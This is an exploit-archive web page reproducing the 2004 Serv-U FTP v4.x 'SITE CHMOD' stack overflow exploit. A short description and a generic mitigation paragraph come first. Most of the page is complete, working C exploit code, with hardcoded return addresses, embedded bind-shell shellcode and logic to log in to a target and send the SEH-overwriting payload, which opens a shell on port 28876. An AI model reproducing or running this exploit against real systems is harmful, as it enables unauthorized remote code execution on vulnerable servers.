header-logo
Suggest Exploit
vendor:
by:
7.5
CVSS
HIGH
Remote Code Execution
119
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote Code Execution Vulnerability

This exploit allows an attacker to execute arbitrary code remotely on a vulnerable system. It takes advantage of a buffer overflow vulnerability in the send_command function. By sending a specially crafted command and arguments, an attacker can overwrite the SEH handler and redirect program execution to their shellcode.

Mitigation:

To mitigate this vulnerability, ensure that all input data is properly validated and sanitized before being used in any buffer operations. Additionally, consider implementing stack canaries or other runtime protections to detect and prevent buffer overflows.
Source

Exploit-DB raw data:

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define exploit_length      511
#define NOP 'A'

#define SEH_handler_offset  400
char* SEH_handler     = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b

char* shellcode = 
  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a"
  "\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb"
  "\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0"
  "\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44"
  "\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b"
  "\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff"
  "\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff"
  "\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0"
  "\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";

int sock;
FILE* FILEsock;
int doubling;

void send_command(char *command, char *arguments) {
  int i;
  send(sock, command, strlen(command), 0);
  send(sock, " ", 1, 0);
  for (i=0; i<strlen(arguments); i++) {
    send(sock, arguments+i, 1, 0);
    if (doubling && arguments[i] == '\xff') send(sock, arguments+i, 1, 0);
  }
  send(sock, "\x0a\x0d", 2, 0);
}

int main(int argc, char *argv[], char *envp[]) {
  struct sockaddr_in addr;
  char *outbuffer, inbuffer[256];
  char *retaddress = NULL;
  char *version = NULL;

  if (argc<5) {
    printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
    exit(-1);
  }

  printf("- Serv-ME ----------------------------------------------------\n"
         "  Serv-U v4.x \"site chmod\" exploit.\n"
         "  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
         "  Credits for the vulnerability go to ICBM <icbm@0x557.net>.\n"
         "  Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
         "  Greets to everyone at 0dd and #netric.\n"
         "  (K)(L)(F) for Suzan.\n"
         "\n"
         "  Binds a shell at %s:28876 if successfull.\n"
         "  Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
         "--------------------------------------------------------------\n",
           argv[1]);

  addr.sin_family = AF_INET;
  addr.sin_port = htons(atoi(argv[2]));
  addr.sin_addr.s_addr = inet_addr(argv[1]);

  printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    perror("Socket creation failed");
    exit(-1);
  }
  if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
    perror("Connection failed");
    exit(-1);
  }
  FILEsock = fdopen(sock, "r");
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  if (strstr(inbuffer, "220 Serv-U FTP Server v4.") != inbuffer) {
    printf("[-] This is not a Serv-U v4.X ftp server.\n");
    exit(-1);
  }
  if (strstr(inbuffer, "v4.1") > 0) {
    retaddress = retaddress_4103;
    version = "4.1.0.3";
  }

  printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
  send_command("USER", argv[3]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  send_command("PASS", argv[4]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  if (strstr(inbuffer, "230") != inbuffer) {
    printf("[-] Login failed.\n");
    exit(-1);
  }

  if (argv[5]) {
    printf("\n[+] Changing directory...\n");
    send_command("CD", argv[5]);
    printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  }

  outbuffer = (char*) malloc(exploit_length + strlen(shellcode));
  memset(outbuffer, NOP, exploit_length);
  memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));

  printf("\n[+] Checking if \\xff doubling is nescesary: ");
  send_command("SITE CHMOD 477", "-\xff\xff-");
  fgets(inbuffer, sizeof inbuffer, FILEsock);
  if (strchr(inbuffer, '\xff') == strrchr(inbuffer, '\xff')) {
    doubling = 1;
    printf("Yes.");
    retaddress = retaddress_4004;
    version = "4.0.0.4";
  } else {
    printf("No.");
    if (retaddress==NULL) {
      retaddress = retaddress_4100;
      version = "4.1.0.0";
    }
  }
  printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
                      version, *(int*)retaddress);
  memcpy(outbuffer + SEH_handler_offset, SEH_handler, strlen(SEH_handler));
  memcpy(outbuffer + SEH_handler_offset + 4, retaddress, strlen(retaddress));

  printf("\n[+] Sending exploit... ");
  send_command("SITE CHMOD 477", outbuffer);
  printf("send, you can now try to connect to %s:28876.\n", argv[1]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  close(socket);
  printf("\n[+] Done. \n");
}


// milw0rm.com [2004-01-30]

Navigation

Suggest Exploit

Services By CQR